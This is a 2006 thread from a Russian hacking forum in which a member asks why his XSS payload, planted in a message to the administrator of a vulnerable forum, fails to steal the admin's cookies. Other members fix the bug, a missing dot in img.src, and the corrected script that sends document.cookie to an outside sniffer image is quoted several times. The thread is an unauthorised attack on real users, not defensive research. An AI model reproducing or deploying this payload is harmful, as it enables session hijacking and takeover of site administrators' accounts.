HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Вопрос по организации XSS атаки, на уязвимом форуме..
  #1  
Старый 09.07.2006, 10:09
a1nt
Участник форума
Регистрация: 16.12.2005
Сообщений: 146
С нами: 10736573

Репутация: 114
По умолчанию Вопрос по организации XSS атаки, на уязвимом форуме..

Нашел уязвимый форум, где можно вставить
Код:
<script></script>
. Чтобы забрать cookies админа отправил ему сообщение
Код:
<script>img = new Image(); img src = "http://antichat.org/s/a1nt.gif?"+document.cookie;</script>
Где картинк - сниффер на antichat.org. Но когда я написал этот код в html и открыл браузером - моя загрузка в лог добавлена не была, только когда напрямую обращаюсь к http://antichat.org/s/a1nt.gif, мой IP добавляется. В чем же все-таки проблема и стоит ли мне ждать админских cookies?
 
Ответить с цитированием

  #2  
Старый 09.07.2006, 11:49
Azazel
Заведующий всем
Регистрация: 17.04.2005
Сообщений: 1,062
С нами: 11087066

Репутация: 561


По умолчанию

Посмотри что у тебя в сорсе сообщения. Может фильтруются символы какие-нибудь.
__________________
Full DNS report
 
Ответить с цитированием

  #3  
Старый 09.07.2006, 19:40
a1nt
Участник форума
Регистрация: 16.12.2005
Сообщений: 146
С нами: 10736573

Репутация: 114
По умолчанию

В том то и дело, что уязвимость проверенная. Я не понимаю почему конструкция
Код:
<script>img = new Image(); img src = "http://antichat.org/s/a1nt.gif?"+document.cookie;</script>
Не работает на моем компьютере.
 
Ответить с цитированием

  #4  
Старый 09.07.2006, 20:07
FQziT
Постоянный
Регистрация: 03.11.2005
Сообщений: 591
С нами: 10798886

Репутация: 523


По умолчанию

Цитата:
<script>img = new Image(); img src = "http://antichat.org/s/a1nt.gif?"+document.cookie;</script>
Цитата:
<script>img = new Image(); img.src = "http://antichat.org/s/a1nt.gif?"+document.cookie;</script>
Найди отличие
 
Ответить с цитированием

  #5  
Старый 09.07.2006, 20:19
Dracula4ever
Постоянный
Регистрация: 08.05.2006
Сообщений: 559
С нами: 10531106

Репутация: 354


По умолчанию

Цитата:
Сообщение от FQziT  
Найди отличие
я помогу.

Цитата:
<script>img = new Image(); img src = "http://antichat.org/s/a1nt.gif?"+document.cookie;</script>
Цитата:
<script>img = new Image(); img.src = "http://antichat.org/s/a1nt.gif?"+document.cookie;</script>
 
Ответить с цитированием

  #6  
Старый 09.07.2006, 20:21
D1mOn
Постоянный
Регистрация: 02.10.2005
Сообщений: 490
С нами: 10845026

Репутация: 212
По умолчанию

Цитата:
<script>img = new Image(); img.src = "http://antichat.org/s/a1nt.gif?"+document.cookie;</script>
точку забыл!
 
Ответить с цитированием

  #7  
Старый 09.07.2006, 20:29
podkashey
Познавший АНТИЧАТ
Регистрация: 18.06.2005
Сообщений: 1,004
С нами: 10997666

Репутация: 1320


По умолчанию

a1nt, это приватная инфа - в паблике нету...
 
Ответить с цитированием

  #8  
Старый 09.07.2006, 20:34
FQziT
Постоянный
Регистрация: 03.11.2005
Сообщений: 591
С нами: 10798886

Репутация: 523


По умолчанию

dracula4ever, D1mOn: Пять за сообразительность :-)
 
Ответить с цитированием

  #9  
Старый 09.07.2006, 20:58
a1nt
Участник форума
Регистрация: 16.12.2005
Сообщений: 146
С нами: 10736573

Репутация: 114
По умолчанию

Епс!! Надо ж так... Ухххх..... Спасибо что ткнули носом, извините за ламеризм.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Xss для новичков Micr0b Уязвимости 79 06.07.2018 22:05
Вопрос по применению XSS на форуме ExBB 1.9.1 TweakeR Уязвимости CMS / форумов 9 28.02.2006 18:24
Вопрос про проведению атаки класса XSS, в форуме Invison Power Board badboy Уязвимости CMS / форумов 10 02.06.2005 22:28



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.